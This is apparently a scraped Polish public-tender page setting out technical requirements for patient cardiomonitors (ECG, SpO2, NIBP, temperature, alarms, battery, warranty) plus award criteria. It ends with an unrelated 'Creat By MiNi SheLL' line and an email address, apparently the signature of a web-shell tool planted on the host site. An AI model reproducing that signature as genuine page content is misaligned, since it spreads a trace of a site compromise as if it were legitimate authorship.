3	Zasilanie sieciowe 230V oraz awaryjne akumulatorowe zapewniające podstawowe monitorowanie przez min. 2 godziny w przypadku braku zasilania sieciowego. Czas ładowania baterii poniżej 7 godzin. Stale widoczny wskaźnik poziomu naładowania baterii.  Temperatura pracy kardiomonitora w zakresie 5~40°C. 
Waga poniżej 4 kg. 
4	Prezentacja danych: 
- wyświetlanie min. 4 krzywych z funkcją kaskady dla krzywej EKG
- pamięć min. 400 wyników pomiarów NIBP
- prezentacja trendów graficznych, tabelarycznych z ostatnich min. 90 godzin.
5	Monitor przystosowany do pracy w sieci centralnego monitorowania w standardzie Ethernet.
6	Alarmy
Co najmniej 3 stopniowy system alarmów - alarmy dźwiękowe i wizualne wszystkich monitorowanych parametrów z możliwością wyciszenia i zmian granic alarmowych dla każdego parametru. Min. 5 poziomów głośności alarmów. Czas wyciszenia alarmów programowany w zakresie 2-30 minut oraz możliwość wyciszenia na stałe. 
7	EKG - oddech
Monitorowanie czynności oddechowej oraz EKG (w komplecie przewód 5 elektrodowy z możliwością wypięcia pojedynczych odprowadzeń). Analiza arytmii - klasyfikacja min. 13 rodzajów zaburzeń. Pomiar odcinka ST w zakresie min. od -20 do +20 mm.  Pomiar HR w zakresie min. 15-350 na min.
Pomiar częstości oddechu w zakresie min. 6-150 odd. na min. Alarm bezdechu w zakresie min. 10-40 sekund.
8	SpO2
Monitorowanie SpO2 w zakresie 0-100%. Zakres pomiarowy tętna min. 0-250  na min. Prezentacja krzywej PLETH, wartości liczbowej tętna, saturacji.
Jeden czujnik dla pacjentów dorosłych na każdy monitor typu klips na palec wraz z kablem połączeniowym.  
9	NIBP
Pomiar nieinwazyjny ciśnienia (NIBP). Zakres pomiarowy min. 10-270 mmHg. Tryby pomiaru: ręczny, automatyczny, ciągły. Możliwość programowania odstępu między pomiarami w trybie automatycznym w zakresie min. 1-480 minut. Możliwość ręcznego zaprogramowania wartości ciśnienia w mankiecie. Zintegrowana z monitorem osłona suwakowa chroniąca przed dostawaniem się kurzu.
Min. 1 mankiet w rozmiarze średnim na każdy monitor oraz wąż łączący. 
10	Temperatura
Monitorowanie temperatury w min. 2 kanałach w zakresie min. 0-50 stopni C. Możliwość pomiaru powierzchniowego lub głębokiego (w zestawie min. 1 czujnik na każdy monitor).
11	Pozostałe parametry:
Możliwość rozbudowy o drukarkę termiczną. Szerokość papieru 50mm.
12	Urządzenie klasy I, BF oraz CF.
13	Łączność - USB, gniazdo przywołania pielęgniarki,         port Ethernet.
14	Gwarancja min. 24 miesiące.
15	Komunikacja z aparatem w języku polskim.
16	Instrukcja obsługi w języku polskim - wersja papierowa.
17	Sprzęt gotowy do użytku (komplet wymaganych akcesoriów) bez dodatkowych inwestycji ze strony Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com